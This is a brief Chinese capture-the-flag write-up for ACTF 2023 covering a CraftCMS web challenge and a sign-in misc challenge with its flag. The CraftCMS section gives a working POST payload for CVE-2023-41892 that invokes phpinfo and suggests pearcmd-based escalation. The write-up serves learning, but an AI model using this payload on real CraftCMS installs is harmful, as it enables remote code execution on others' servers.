前言

忘了留时间打这个了，速通签到了个原神大学就润了，看看别人的复现（

题目源码：https://github.com/team-s2/ACTF-2023/tree/main

奇怪的是我尝试起docker复现的时候报错exit:1了。。。

Web

craftcms（未完成）

craftcms

参考文章：http://www.bmth666.cn/2023/09/26/CVE-2023-41892-CraftCMS%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

先post传参看phpinfo

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}

尝试日志包含，发现打不通。。。应该是没生成日志文件

但是查看phpinfo可以发现开了register_argc_argv，结合日志包含肯定存在include函数这一点，也就是说可以用pearcmd打

Misc

SIGNIN: 东方原神大学

访问www.东方原神大学.com，趁还没重定向跳转到浙大官网，ctrl+u获得flag

flag：ACTF{w2Lc0Me_2_@ctF2o23#azUr3_A$$asS1N_alIiaNc3}